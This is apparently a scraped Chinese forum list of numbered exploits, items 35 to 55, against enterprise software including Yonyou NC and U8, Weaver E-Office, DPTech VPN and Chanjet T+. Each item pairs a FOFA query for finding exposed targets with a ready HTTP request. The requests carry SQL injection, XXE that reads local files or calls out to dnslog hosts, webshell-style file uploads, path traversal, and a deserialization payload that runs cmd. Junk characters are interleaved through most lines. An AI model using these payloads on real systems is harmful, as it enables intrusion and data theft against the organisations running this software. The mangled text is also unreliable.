FOFA:app="用友-UFIDA-NC"- \$ V3 U; l  x# E. [! S  G$ v
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1- I& E: {5 h9 R# E
Host: your-ip
1 k" N, V; g; \/ K5 O% q7 xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 I/ ?) C) c0 H+ X8 I3 o: [
Content-Type: application/x-www-form-urlencoded4 k2 Z/ ^  Y  C# o
Accept-Encoding: gzip, deflate7 @; Y" Z7 D$ h
Accept: */*
! o+ v4 r9 Y) o% f8 iConnection: keep-alive# E- S0 E' l6 |  o4 I% ^; }

* f; d4 z; r' ^
* z( D! Z6 S8 U  m. y* M35. 用友NC-Cloud importhttpscer任意文件上传
9 \% `8 z! M: {9 z' T0 gFOFA:app="用友-NC-Cloud"/ H& A( m% |8 k* w4 h! k+ C
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
( f6 s7 w% F" o4 y, THost: 203.25.218.166:88887 D" [' g0 X/ S- d; Q
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
" N- X9 e1 s4 R( jAccept-Encoding: gzip, deflate- L+ o; o6 w1 h/ t9 O
Accept: */*; l' w# l2 q8 l+ m; u5 s, r
Connection: close+ o' z8 G* m1 J# @) _
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
: y( q! @1 k0 ]$ g3 j% f2 jContent-Length: 190
$ u% q& ^9 ^% B- Y9 B4 r* eContent-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df00 G9 @  K+ l% U7 H
3 H# Q5 z, ]0 M! O) C9 \
--fd28cb44e829ed1c197ec3bc71748df0) L& y) r& r* U2 p* L1 {
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
2 P. D4 F2 s! k: z
( M# M0 T$ G  N  e$ m<%out.println(1111*1111);%>
0 _  a& C+ G' s--fd28cb44e829ed1c197ec3bc71748df0--/ Y. T# c! N9 B1 [! D
$ C/ t: G5 P( C' _) q/ K
* o$ l% M1 D! V' H. p6 I) R
36. 用友NC-Cloud soapFormat XXE1 t- _% `; @, @+ c( d2 g
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"* d" b, d, C4 G% z$ x
POST /uapws/soapFormat.ajax HTTP/1.1% I, k) e* x) d$ h# K2 h
Host: 192.168.40.130:8989
( n- }$ l; j8 _User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
- E7 M4 _  p3 ]! zContent-Length: 263) X$ j' p0 Z: s: \3 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' p6 k4 ?7 e5 L4 _# N' x0 n6 U
Accept-Encoding: gzip, deflate
! j& Z, V, A- H6 o2 hAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& t7 D  r9 E( n1 M$ I& W% ?
Connection: close& c# t' R! C7 c5 J9 T/ J! a( e) ~
Content-Type: application/x-www-form-urlencoded/ w' Y1 b  Y2 _. d' H  b2 Q, I
Upgrade-Insecure-Requests: 1
1 l* E2 ^2 w0 [' O
. |, A3 B! l# H) _msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a! d2 `, W  ]8 D

$ e! ]2 z9 S# m+ n! f/ P6 {+ `! W! Y1 g3 |, v+ f2 _2 M3 m2 i
37. 用友NC-Cloud IUpdateService XXE) u& a$ z; ]( _3 j( i
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"* Y5 u4 n; [; Q; C1 _7 k5 m
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1: [9 V" p5 D! z; g3 X5 D1 O
Host: 192.168.40.130:8989
  O7 F! K& f: z) FUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
3 v, i, A, m% m; |! i5 F& EContent-Length: 4212 |" I$ y) V5 D9 n4 Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
( G' T+ e! E7 @7 m. V0 bAccept-Encoding: gzip, deflate% f1 d( }% I3 g; m8 l' V
Accept-Language: zh-CN,zh;q=0.9
! x' r0 Z7 {7 A( U; L4 g: y5 ?Connection: close$ Q. g" A/ r) O# m$ m4 ?
Content-Type: text/xml;charset=UTF-8
' Q: h2 b7 O* p# TSOAPAction: urn:getResult
& Z. j8 F. |  _, @0 cUpgrade-Insecure-Requests: 1
% h- h) n5 n) U1 U! W/ G4 \
3 G, R% N/ y! e2 @+ n<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
2 [3 |( O4 y5 T  K8 M6 J) A4 K; h, {<soapenv:Header/>
% L* o$ Y0 K/ B4 V; L) q<soapenv:Body>; A! ^( i+ l! J( K' N0 i
<iup:getResult>
  Z* U; d: H( [' E+ _<!--type: string-->! f. V9 o. O1 _, p% W' E  G
<iup:string><![CDATA[
0 M; q5 @4 k+ a<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>, q. N& V1 W" r, N
<xxx/>]]></iup:string>  B8 D% Z2 `( L  S/ X0 t
</iup:getResult>+ n+ e' j, O3 {9 @; s2 j- ?
</soapenv:Body>* O4 j0 [4 P4 _  n  {! t( c) _
</soapenv:Envelope>  h) f1 v; f% F! i9 t7 H7 R/ x
- w7 ^( T  F  Y" T: p$ {

* A9 U9 w8 [' [( x/ E2 X0 Q
# V9 |0 J+ N; o6 h38. 用友U8 Cloud smartweb2.RPC.d XXE+ U, k, p, v( l  B; \. Z
FOFA:app="用友-U8-Cloud"
6 _% y# ^6 m3 mPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
, h2 w' D" w4 S/ C, ]Host: 192.168.40.131:8088
0 O$ d# h# T/ A. K' G, W/ AUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
9 Y  h. H/ K' V3 f* aContent-Length: 2602 m& o& \0 c" D% l/ ~( l4 ]. u; f0 ]9 q/ y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3% V/ A0 t/ t9 ^$ s5 w) q
Accept-Encoding: gzip, deflate( j8 f5 `! U% ]& \  y. P% e# Y" S" H
Accept-Language: zh-CN,zh;q=0.92 N: u+ e# A0 }) b
Connection: close
2 N# A: F( D: F8 cContent-Type: application/x-www-form-urlencoded3 D6 k" x/ b8 L4 V4 O/ h7 }/ R# d- x

) c3 C8 N2 t  h9 p! @2 J__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
  g7 W8 V  {% P- s2 o" D" z9 X3 `) s9 h0 S! ^

* \" a# x$ j) i: Y8 f39. 用友U8 Cloud RegisterServlet SQL注入
$ S' }4 y0 k3 }* p+ J$ g5 d; lFOFA:title="u8c"
/ Z( \$ i) A' V+ OPOST /servlet/RegisterServlet HTTP/1.1
4 n9 r6 M! p2 e7 {# `Host: 192.168.86.128:8089( b- v* I6 F0 d2 A+ |- @% m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
8 u( h$ s! Z0 W% a' jConnection: close
( J) P0 N* u' C) o7 b4 TContent-Length: 858 C, t9 u  `( U0 V( e
Accept: */*9 j4 x4 r5 r' j
Accept-Language: en% V( f7 z8 j5 G2 w/ a
Content-Type: application/x-www-form-urlencoded! L8 q* _; u0 d( Q
X-Forwarded-For: 127.0.0.1
, }6 L3 {7 I; A, `7 {, R- MAccept-Encoding: gzip. O5 I( v$ t* N' \) D

( b0 }* L" g0 U3 P/ f5 musercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
9 f/ y# Y7 O5 T1 b
& p8 K0 ^( [" Y4 l) ]) s5 ^9 J0 I5 ~9 ~0 b1 B5 o3 t+ n& ?
40. 用友U8-Cloud XChangeServlet XXE
* X' P$ Y+ c& ?0 l! L8 tFOFA:app="用友-U8-Cloud"& x: q6 j' ~+ r0 l1 ?$ i
POST /service/XChangeServlet HTTP/1.1
- C/ N: {( y3 V4 ?+ D5 v& G* rHost: x.x.x.x
3 t2 |4 P% A8 W3 u# L2 hUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
* D+ [6 [6 g7 F6 {) c# L: JContent-Type: text/xml) G! M# Y: u! l; x; {' v
Connection: close% Q9 r! U8 u7 [6 \9 k
  q4 l4 t$ u( ]7 E$ D3 Y
<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>
$ n+ ^' Y1 ]: w
$ c- q  E0 k: _9 c1 ?/ I/ Z- f0 K" C8 ]
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
- `( m" C) G5 z8 y* n5 rFOFA:app="用友-U8-Cloud"
% z# w9 X1 w- I" G6 e9 b/ M4 }" aGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
5 B$ _# q, q& e& z* z, _Host:
" ^# }( s( P" S/ z- wUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
' Z. J- a; G7 @$ u  jContent-Type: application/json0 t6 F6 j4 i8 Y" `6 b/ u) P: R
Accept-Encoding: gzip4 s1 u: B% g( ~
Connection: close7 A& P. i( J' L0 Y$ c; p
. w, T4 w: E6 P- C! v* k5 V

( F- i0 o/ x) W8 M% E' w* X42. 用友GRP-U8 SmartUpload01 文件上传
8 n: @8 _0 f) \* d0 MFOFA:app="用友-GRP-U8"
6 V0 q  t5 \! }  I- p: `POST /u8qx/SmartUpload01.jsp HTTP/1.1! X  N2 \0 v9 Q0 t
Host: x.x.x.x
4 g- W+ R# B: k. U; fContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt1 ]% j- ?5 U# {; R+ b& m+ |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36: j1 S3 `6 k2 u  p' C
- V4 j/ C) j/ {- a) p
PAYLOAD8 Q4 B5 t! P5 X* G) [& F# l6 I, x
4 p3 j* {( D$ Y6 O7 O* |! B

/ l& ~* Z; I8 ]. \* Qhttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
& k3 R* c& e) m8 J. L' r$ m5 r0 a9 j( R$ B( `7 U3 E- T) z8 c
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
$ Z$ {  c! h6 W* T# CFOFA:app="用友-GRP-U8"4 a7 b8 g% p. n$ R3 e. o1 {( d
POST /services/userInfoWeb HTTP/1.1
' }- t) l$ y# O# Z: b6 vHost: your-ip
/ j% I9 r7 T& RUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36  j( b2 k$ E+ J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 B, `' T$ G+ `2 k3 r, a$ L
Accept-Encoding: gzip, deflate( a8 e" o/ @3 R9 O
Accept-Language: zh-CN,zh;q=0.9
. I. J8 `7 B2 B6 K# MConnection: close0 s6 ]3 h4 ?$ B8 ]( y
SOAPAction:: T4 O( V2 I$ D$ J, x0 U0 V
Content-Type: text/xml;charset=UTF-8# e$ X( ?/ ~  g. c" B

" G& l- {3 j( t5 u0 \<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
" j4 ^! j8 ?5 a+ {: J. {   <soapenv:Header/>7 ]3 h6 i6 f6 Y1 K% g
   <soapenv:Body>/ ^. g8 M/ |$ f' p* l
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">0 p6 {. R& H5 j1 q
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
7 R4 J0 d6 D# W- S: T7 o      </ser:getUserNameById>
7 L+ T- w$ \7 ^- w4 C9 Q   </soapenv:Body>9 a9 f! H9 z  F! P# [/ r8 p: D
</soapenv:Envelope>
( h& Y! L9 Q6 }2 v* m& `
7 E) [  A0 U6 [! k  e- ^) Y
" j" d7 o3 j) [1 R5 L; `44. 用友GRP-U8 bx_dj_check.jsp SQL注入- H0 s/ u% D* n+ _
FOFA:app="用友-GRP-U8"
. K0 L6 V1 W( _# bGET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.14 t* f3 ]9 @( _/ Y* B+ E' `# i% o8 S
Host: your-ip7 X2 s6 K0 v3 Y" K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
/ {4 U" B, v, K5 m, @  W$ Y: fAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 Z  n3 f7 \  U) T
Accept-Encoding: gzip, deflate9 ^1 ~# S$ x) c/ k
Accept-Language: zh-CN,zh;q=0.9; e4 r. [% W, y2 r) ~4 g, @
Connection: close
* \3 g3 z# ?1 E- O* [) ?  @8 U; e9 N  \( N" N
4 P( ?( m1 {( g- S
45. 用友GRP-U8 ufgovbank XXE( |- Y# T3 ~5 `7 S! L
FOFA:app="用友-GRP-U8"
2 t7 M/ b; [) ?3 J  a0 PPOST /ufgovbank HTTP/1.10 F5 ]7 u! [% d0 R
Host: 192.168.40.130:222& T7 q4 u  s* e" A3 n' u  d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
* g: z$ i' x; N& E0 W' iConnection: close
5 ]5 c/ B4 h9 `1 VContent-Length: 161
7 C6 j8 e! X  H6 S" ]Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* O' k& ?8 Q6 s) ^3 x0 b) [Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; Y. h9 t9 k5 S. h9 m# O9 K# `
Content-Type: application/x-www-form-urlencoded
3 D" c2 u5 m4 J( E) s, v+ JAccept-Encoding: gzip' G/ I0 p; q4 u3 f! @, l

6 f6 J+ e9 q4 X* e( p, S: m/ nreqData=<?xml version="1.0"?>$ G1 g9 f/ K/ A1 z4 ?( x8 z( c' Y
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest( ^3 \( t$ w5 f& j* t+ f
2 \% j7 t- R  D; y

( b* Z% S3 ?: v1 L3 p, z46. 用友GRP-U8 sqcxIndex.jsp SQL注入( e/ X9 j  ~' L8 ]' y) h
FOFA:app="用友-GRP-U8"
1 O* ]1 n! q& Y9 @0 jGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.19 [- ^- S" P' i  \, |
Host: your-ip, b* c+ K* ~5 I$ o+ b% |! {: K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
$ b4 f' |- h5 X: s# U1 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
7 H$ V7 z; S9 ?! WAccept-Encoding: gzip, deflate
1 d: L5 B% @7 c  I1 x  DAccept-Language: zh-CN,zh;q=0.9
8 `' D, e5 w5 iConnection: close- e- z7 G4 U, b& }5 ?
; D  J/ a2 B5 b
& R; r- a. F+ o, ?$ m9 o( `6 S
47. 用友GRP A++Cloud 政府财务云 任意文件读取0 N- `+ ?# ?% J( l! T
FOFA:body="/pf/portal/login/css/fonts/style.css"
' q) d1 M& V9 P  X- H& hGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
; @3 z) _5 u* o( e5 \Host: x.x.x.x
% a% F8 ]! d  L, a9 P6 ?: rCache-Control: max-age=0; T3 f6 y. `5 N3 [3 W8 y) c! o
Upgrade-Insecure-Requests: 1
% S: ]* S8 ^2 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.364 R9 ?) u" x; _% d) k: `) e4 N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 V# J  x$ B, m  G& RAccept-Encoding: gzip, deflate, br; H! t8 N2 M8 C) P+ y4 c0 ^
Accept-Language: zh-CN,zh;q=0.93 Z& Z6 t" j6 B# g+ ~# T
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT" e( d0 k1 P, X# l6 c
Connection: close
/ \4 @, C  x. L! g: A
* s$ G+ ]: F3 }1 n9 T5 T1 D: O1 ~3 N& s/ U) @
! `8 v! k: T! {: p" t  z& ]( h
48. 用友U8 CRM swfupload 任意文件上传
8 m5 V1 H# K* ~# z+ A- e* ?FOFA:title="用友U8CRM"
9 ~' Y; v+ Y6 N/ x5 j0 ]; `' B  J+ DPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1$ A! T! I8 k: @2 r6 |4 a  L$ ~
Host: your-ip; t/ b5 Z9 U1 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ d5 u: \- f" _  Y5 k' `Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
) i& E" J5 M, \* G: C+ M0 \% yAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 D$ f# \6 f  m4 n0 t+ S8 QAccept-Encoding: gzip, deflate$ ~8 I* K7 A! Y& Q1 t; N
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855" y% `4 Q7 L0 |) k: ]
------269520967239406871642430066855
$ Q/ s$ ]# Z0 o! K$ l& jContent-Disposition: form-data; name="file"; filename="s.php"
0 T; v9 b; \) L' B! C8 b4 e" t1231* o6 M, {# v9 u' m4 \0 s. D
Content-Type: application/octet-stream
9 ~, \8 p" U) P1 q------269520967239406871642430066855
5 M3 B+ A! y$ e$ i8 [, ]+ zContent-Disposition: form-data; name="upload"1 Y; R' T$ z$ ^7 S
upload. z. V$ t$ P  B9 y/ R% m6 s
------269520967239406871642430066855--& Q, q7 B  i! D

: z# _! f1 h+ r0 l4 ^  e8 p% Z' K
49. 用友U8 CRM系统uploadfile.php接口任意文件上传% w+ r1 D9 H% T4 q. F
FOFA:body="用友U8CRM"; j) ?- K. R) ^% D8 l# e3 v
2 y0 |! z6 [3 C
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
  x1 E; e; b) |/ PHost: x.x.x.x
9 m5 R% v- R; z( UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
6 t; x8 R2 B& c7 B+ X- ?$ K" QContent-Length: 329$ O# k$ d5 a1 e5 T1 C% I+ }6 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
& P" h$ s, _8 a9 ^! k5 [+ N1 w# _Accept-Encoding: gzip, deflate
  E3 U5 B0 r0 p& }& zAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 ?) r% o3 o3 A% R
Connection: close
$ R  _' K) }8 d( Z, E5 FContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w
9 Z* I  A* m- t; w- w% t$ S: D
' I! H% t. b2 d$ e9 A-----------------------------vvv3wdayqv3yppdxvn3w
# t9 S. ]; ]9 c) k/ Y0 i1 RContent-Disposition: form-data; name="file"; filename="%s.php "
8 j/ |, z9 ^+ H% Y! FContent-Type: application/octet-stream. z: d' P3 A% H- _7 Y7 k1 G
$ V6 w% s6 h9 l+ `3 u
wersqqmlumloqa
, V8 S' H: l5 N+ a' P5 s& Y$ l" X( k-----------------------------vvv3wdayqv3yppdxvn3w% u1 O% i/ H' I. I
Content-Disposition: form-data; name="upload"7 I% P' {$ m. t: B# T: M' ^

" W) {5 o! s) G! ]: [% hupload8 e& c+ s& h" o# F! s# X4 v
-----------------------------vvv3wdayqv3yppdxvn3w--3 b% r/ h1 \5 _( u
: n7 k- }8 A; r/ C- L0 E
9 ~% R# s9 `& Z' }
http://x.x.x.x/tmpfile/updB3CB.tmp.php
- F9 t1 o$ K# J3 V0 W8 Q) O+ D& U4 w3 t! r; T! G* \0 B9 _3 S
50. QDocs Smart School 6.4.1 filterRecords SQL注入! ~2 ^4 i% W) w" D1 p2 ?2 F
FOFA:body="close closebtnmodal"
. B+ i* S0 b8 ~3 i9 jPOST /course/filterRecords/ HTTP/1.1" z; k5 ]  N8 ~/ Z2 {) A  N0 M
Host: x.x.x.x) g; [4 V7 F) q: \
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.368 h1 m, i% }: o; B, N6 ~
Connection: close1 Y/ p. j+ _+ B: ~- ?5 M! l# k
Content-Length: 2241 F6 [  D' |% z3 I, ~" z0 n% H9 v% b! c
Accept: */*
/ j# E3 @6 h- mAccept-Language: en0 \, Y7 J6 L- X: j. b: i$ H% S3 ?
Content-Type: application/x-www-form-urlencoded
% U3 \" H- K# v2 w9 HAccept-Encoding: gzip
! C8 W$ R* N3 b9 Z0 B; \" I/ E3 l+ O6 C+ H
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=10 p) w# |: n2 D
& D# G6 G5 D0 N# I
) N! i- R4 W" ^, y: T) Y- f7 _
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入4 X0 f, {- e4 W8 g' t$ l
FOFA:app="云时空社会化商业ERP系统". P. @; j4 f1 u
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1, l( N, B7 q8 @% M  c# c
Host: your-ip
5 g* T4 b0 P3 b: NUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.360 p' z6 t% G- W( x2 c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.92 G) K8 b6 O3 k/ E, y
Accept-Encoding: gzip, deflate2 P+ E. I! D' N) a8 B
Accept-Language: zh-CN,zh;q=0.9: i* i3 ]* \6 W# Y7 B
Connection: close3 r+ E* J1 B3 D* v( D& o- S

7 a) x, A; m- i+ @- w
9 b, S; D4 l; y0 ]52. 泛微E-Office json_common.php sql注入
1 r9 |1 F. e+ v  e$ }; OFOFA:app="泛微-EOffice"
6 v/ C( Q  T. L& X' c3 ]" fPOST /building/json_common.php HTTP/1.12 y1 x( q# j6 u5 O0 g9 A# M
Host: 192.168.86.128:8097
0 x9 R* m# n, _9 eUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 p0 f- I, }& d6 b  S" IConnection: close. z# `- k  g- b/ ~! `* |
Content-Length: 87
5 S  M, q0 v+ u* x2 l( v+ H! _Accept: */*+ I# R2 M$ {8 j$ b5 Y
Accept-Language: en
5 D- V3 x0 {9 E7 j+ o, }Content-Type: application/x-www-form-urlencoded
3 k# R, Y! E6 N: `5 n0 ZAccept-Encoding: gzip5 ?+ _3 ^* m8 i+ u
2 S. R4 D0 u; |3 ?( ]" u
tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
) _4 {  q2 ~4 |8 ~# p0 ~5 f
& l) }- w* |" w' C' N( D4 @$ |' _# a
53. 迪普 DPTech VPN Service 任意文件上传
& x) }+ J7 V9 P, u- C' BFOFA:app="DPtech-SSLVPN"
( R* {+ j7 E( a& S3 \( n/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
9 P$ Y" u+ C4 W$ G* Y- [3 w) E" l  X" C( C8 W* D8 S1 @
$ u3 d6 L' V$ r& v& j
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
. L6 u3 z( G# F- g, [& o2 C. H. RFOFA:app="畅捷通-TPlus"
' V& b. U- d" T  ~, W第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
! c  S3 v* Y: b& {! g"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
' D% D6 `) e5 S) Y& g3 X/ x# s/ L+ l' o7 u. E
: a5 b  Z" w' ?; S$ w0 A! ?
完整数据包
! r+ l- ]* p' t3 v6 L$ x1 z1 rPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
; M+ N& W6 k4 x3 @! a8 E# N, s+ ~& ~Host: x.x.x.x
7 k  k, e5 A8 Z# b" YUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F; _2 S) P4 U: Z
Content-Length: 5936 V# l3 C7 s. X

# M* Z9 V7 Y& ?) l( ]+ N( V{
6 u7 a7 a; g' [1 g' q  i; m, b"storeID":{
3 I, |: @; q5 _# l "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",/ S. ?  Y6 R6 t1 y
"MethodName":"Start",
1 }+ t$ w3 g2 ]% U  "ObjectInstance":{
0 J6 [/ Q+ X) r0 E0 o, V  U6 |   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",7 F8 u0 j7 B! g2 O$ u
    "StartInfo":{; k+ O, S: k/ V' _- t% S# ~
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",) |! y% \  g4 E* }$ V: ]
    "FileName":"cmd",
# H% k4 [' X1 F  y    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
4 d! f! ?9 Z& E) ~7 u    }
8 e/ X2 u' f- F4 A" k  }0 k. v+ i! q' J* Q
  }, `0 R0 U1 O- b5 M+ B4 |* [1 B
}
9 e& U4 Z! M% k6 \) T* ]) [3 u# E% g$ d: q3 v+ q

1 g% w/ G; J- Q( L3 X+ M第二步,访问如下url3 Z9 Z+ ?0 Z7 _* E9 v# G) G
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt8 J0 s9 d1 _6 c1 R
8 p2 X! j" r9 \
4 G. ~% l3 F: V$ _
55. 畅捷通T+ getdecallusers信息泄露! d; M( G' l& h! E, r/ g; G* ^- c  F
